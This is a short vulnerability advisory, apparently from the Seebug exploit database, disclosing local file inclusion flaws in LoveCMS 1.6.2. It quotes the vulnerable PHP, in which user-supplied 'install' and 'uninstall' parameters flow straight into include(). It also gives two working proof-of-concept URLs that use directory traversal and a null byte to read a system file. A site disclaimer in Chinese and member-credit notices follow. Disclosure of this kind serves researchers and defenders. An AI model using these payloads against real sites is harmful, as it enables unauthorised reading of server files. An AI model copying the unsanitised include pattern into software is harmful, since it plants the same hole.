LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities found by cOndemned vendor: http://lovecms.org/ download: http://sourceforge.net/project/showfiles.php?group_id=168535 source of /system/admin/modules.php 13. if(isset($_GET['install'])) 14. { 15. $include = $_GET['install']; 16. 17. include(LOVE_ROOT . '/modules/' . $include . '/info.php'); [...] 61. if(isset($_GET['uninstall'])) 62. { 63. $include = $_GET['uninstall']; 64. 65. include(LOVE_ROOT . '/modules/' . $include . '/info.php'); proof of concept http://[host]/[lovecms]/system/admin/modules.php?install=../../../../../etc/motd%00 http://[host]/[lovecms]/system/admin/modules.php?uninstall=../../../../../etc/motd%00
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论